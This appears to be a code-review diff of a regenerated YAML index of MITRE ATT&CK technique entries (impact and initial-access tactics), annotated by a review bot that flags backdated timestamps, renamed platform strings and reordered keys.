Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -58422,7 +59356,7 @@ impact:
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
- Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+ Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -58449,7 +59383,7 @@ impact:
- Network
- IaaS
- Containers
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -58499,13 +59433,12 @@ impact:
url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
- source_name: disable_notif_synology_ransom
description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
- servers before ransom. Retrieved October 19, 2022.
- url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+ servers before ransom. Retrieved September 12, 2024.
+ url: https://x.com/TheDFIRReport/status/1498657590259109894
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1490
atomic_tests: []
T1561.001:
@@ -58573,11 +59506,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1529:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T20:45:22.531Z'
name: System Shutdown/Reboot
description: |-
Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload
).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
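Review bot: `modified` for T1529 moves backwards, from 2023-05-09 to 2023-03-22, and the same happens for T1133 (2023-05-09 to 2023-03-30) and T1195.003 (2022-05-24 to 2022-04-28) later in this patch. A timestamp going into the past is what you get when the previous export came from a bundle with bulk-rewritten dates and this one from the per-object originals; fine if intended, but anything that uses `modified` as a change watermark will not see these objects as updated, so a line in the commit message explaining the source bundle would help.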
@@ -58642,13 +59574,12 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1529
atomic_tests: []
initial-access:
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -58726,7 +59657,6 @@ initial-access:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1195.001:
@@ -58776,11 +59706,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566.002:
technique:
- modified: '2024-04-15T23:51:25.037Z'
+ modified: '2024-10-15T16:06:32.591Z'
name: 'Phishing: Spearphishing Link'
description: |-
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -58819,10 +59748,10 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '2.6'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
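Review bot: `Office 365` and `Google Workspace` are replaced by `Identity Provider` and `Office Suite` in `x_mitre_platforms`, with `x_mitre_version` bumped 2.6 to 2.7 to match. If any per-platform index or filter downstream keys on the old platform strings, those lookups will now silently miss T1566.002 (and T1078.001 and T1199, which get the same rename in this patch), so check that indexes for the new names are generated alongside this change.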
@@ -58839,7 +59768,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: CISA IDN ST05-016
description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
Internationalized Domain Names. Retrieved October 20, 2020.'
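Review bot: the ACSC SPF paper now points at a web.archive.org snapshot dated 2021-07-08, but the description still says `Retrieved October 19, 2020`, which predates the snapshot; the same URL/date pair appears for T1566.001 below. That is upstream ATT&CK text, so no hand edit here, but the mismatch is worth reporting upstream since the retrieval date no longer describes the linked URL.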
@@ -58878,12 +59807,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.002
atomic_tests: []
T1566.001:
technique:
- modified: '2024-01-31T14:09:27.066Z'
+ modified: '2024-10-15T16:42:01.552Z'
name: 'Phishing: Spearphishing Attachment'
description: "Adversaries may send spearphishing emails with a malicious attachment
in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -58945,7 +59873,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Unit 42 DarkHydrus July 2018
description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
Targets Middle East Government. Retrieved August 2, 2018.
@@ -58962,7 +59890,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.001
atomic_tests: []
T1195.003:
@@ -58992,7 +59919,7 @@ initial-access:
the adversary a high degree of control over the system. Hardware backdoors
may be inserted into various devices, such as servers, workstations, network
infrastructure, or peripherals.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:05:10.755Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Hardware Supply Chain
x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -59006,7 +59933,6 @@ initial-access:
- 'Sensor Health: Host Status'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1091:
technique:
@@ -59069,12 +59995,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1195:
technique:
- modified: '2024-02-26T14:23:37.009Z'
+ modified: '2024-10-04T11:17:00.778Z'
name: Supply Chain Compromise
description: "Adversaries may manipulate products or product delivery mechanisms
prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -59149,7 +60074,7 @@ initial-access:
description: Schneider Electric. (2018, August 24). Security Notification
– USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
Retrieved May 28, 2019.
- url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+ url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
- source_name: Trendmicro NPM Compromise
description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -59163,19 +60088,18 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1195
atomic_tests: []
T1190:
technique:
- modified: '2023-11-28T21:27:35.373Z'
+ modified: '2024-09-24T14:33:53.433Z'
name: Exploit Public-Facing Application
description: |-
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
- Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+ Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
- If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+ If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
@@ -59201,7 +60125,7 @@ initial-access:
- Linux
- macOS
- Containers
- x_mitre_version: '2.5'
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -59256,7 +60180,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1659:
technique:
@@ -59319,11 +60242,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -59338,6 +60260,7 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
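Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted between `kill_chain_phases` and `x_mitre_deprecated` for T1078.001, and the following hunks move `x_mitre_modified_by_ref` up and delete both keys from their old slot at the bottom of the object, with no value changing. T1565.002, T1498 and T1199 in the same patch are likewise re-emitted with keys in new positions, and each ends up in a different order (T1199 has `x_mitre_data_sources` after `x_mitre_version`, for example), so the generator appears to preserve whatever field order the upstream JSON has. Emitting keys in a fixed, sorted order would turn these refreshes into reviewable diffs of actual value changes.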
@@ -59346,18 +60269,18 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -59389,14 +60312,11 @@ initial-access:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1199:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:08:39.968Z'
name: Trusted Relationship
description: |-
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -59407,6 +60327,11 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_contributors:
+ - Praetorian
+ - ExtraHop
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: Establish monitoring for activity conducted by second and
third party providers and other trusted entities that may be leveraged as
a means to gain access to the network. Depending on the type of relationship,
@@ -59415,22 +60340,18 @@ initial-access:
is based on IT services. Adversaries may be able to act quickly towards an
objective, so proper monitoring for behavior related to Credential Access,
Lateral Movement, and Collection will be important to detect the intrusion.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Linux
- macOS
- - Office 365
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '2.3'
- x_mitre_contributors:
- - Praetorian
- - ExtraHop
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Logon Session: Logon Session Metadata'
@@ -59455,36 +60376,19 @@ initial-access:
url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566:
technique:
- modified: '2024-03-01T16:56:32.245Z'
+ modified: '2024-10-07T15:00:19.668Z'
name: Phishing
- description: "Adversaries may send phishing messages to gain access to victim
- systems. All forms of phishing are electronically delivered social engineering.
- Phishing can be targeted, known as spearphishing. In spearphishing, a specific
- individual, company, or industry will be targeted by the adversary. More generally,
- adversaries can conduct non-targeted phishing, such as in mass malware spam
- campaigns.\n\nAdversaries may send victims emails containing malicious attachments
- or links, typically to execute malicious code on victim systems. Phishing
- may also be conducted via third-party services, like social media platforms.
- Phishing may also involve social engineering techniques, such as posing as
- a trusted source, as well as evasive techniques such as removing or manipulating
- emails or metadata/headers from compromised accounts being abused to send
- messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
- Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
- Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
- the identity of the sender which can be used to fool both the human recipient
- as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
- may also receive phishing messages that instruct them to call a phone number
- where they are directed to visit a malicious URL, download malware,(Citation:
- sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
- or install adversary-accessible remote management tools onto their computer
- (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
- Unit42 Luna Moth)"
+ description: |-
+ Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+ Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+ Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
@@ -59513,9 +60417,9 @@ initial-access:
- macOS
- Windows
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '2.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Flow'
@@ -59533,7 +60437,11 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: phishing-krebs
+ description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+ Prey on Your Curiosity. Retrieved September 27, 2024.'
+ url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
- source_name: CISA Remote Monitoring and Management Software
description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
and Management Software. Retrieved February 2, 2023.
@@ -59571,11 +60479,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -59592,7 +60499,6 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -59602,7 +60508,7 @@ initial-access:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -59611,19 +60517,17 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -59671,11 +60575,12 @@ initial-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1566.004:
technique:
- modified: '2023-10-15T11:49:40.990Z'
+ modified: '2024-10-15T16:06:47.134Z'
name: Spearphishing Voice
description: |-
Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -59695,10 +60600,8 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- - SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
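Review bot: the platform remap in this hunk has a different shape from the rest of the patch: Office 365, SaaS and Google Workspace are all removed and only Identity Provider is added, with no Office Suite entry, and the T1189 hunk at @@ -59990 likewise swaps SaaS for Identity Provider. Every other remapped object in this patch maps Azure AD / Office 365 / Google Workspace to Identity Provider / Office Suite and leaves SaaS in place, so these two are the only techniques that lose SaaS outright; a quick check against the source bundle for T1566.004 v1.1 and T1189 v1.6 is worthwhile before merging to rule out a generator artifact.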
@@ -59731,7 +60634,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1195.002:
technique:
@@ -59770,7 +60672,7 @@ initial-access:
may be specific to a desired victim set or may be distributed to a broad set
of consumers but only move on to additional tactics on specific victims.(Citation:
Avast CCleaner3 2018)(Citation: Command Five SK 2011) "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:04:36.636Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Software Supply Chain
x_mitre_detection: 'Use verification of distributed binaries through hash checking
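Review bot: `modified` moves backwards in this hunk, from '2022-05-24T14:00:00.188Z' to '2022-04-28T16:04:36.636Z', and the same regression appears later for T1200, T1029, T1011.001, T1048.001, T1048.002, T1041, T1052.001, T1030, T1052 and T1048.003, and in iaas-index.yaml for T1055.011 and T1205.002. The replaced values all end in `.188Z` (mostly `T14:00:00.188Z`), which looks like a normalized placeholder rather than a real edit timestamp, so regenerating from the upstream STIX objects plausibly explains it; please state that in the commit message, since anything that sorts or diffs techniques by `modified` will otherwise treat the regenerated index as older than the one it replaces.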
@@ -59785,7 +60687,6 @@ initial-access:
- 'File: File Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -59865,11 +60766,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1200:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.332Z'
name: Hardware Additions
description: |-
Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -59925,11 +60825,10 @@ initial-access:
url: https://www.youtube.com/watch?v=fXthwl6ShOg
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1189:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:55:47.494Z'
name: Drive-by Compromise
description: "Adversaries may gain access to a system through a user visiting
a website over the normal course of browsing. With this technique, the user's
@@ -59990,8 +60889,8 @@ initial-access:
- Windows
- Linux
- macOS
- - SaaS
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
@@ -60019,13 +60918,12 @@ initial-access:
url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -60065,8 +60963,10 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -60074,13 +60974,13 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
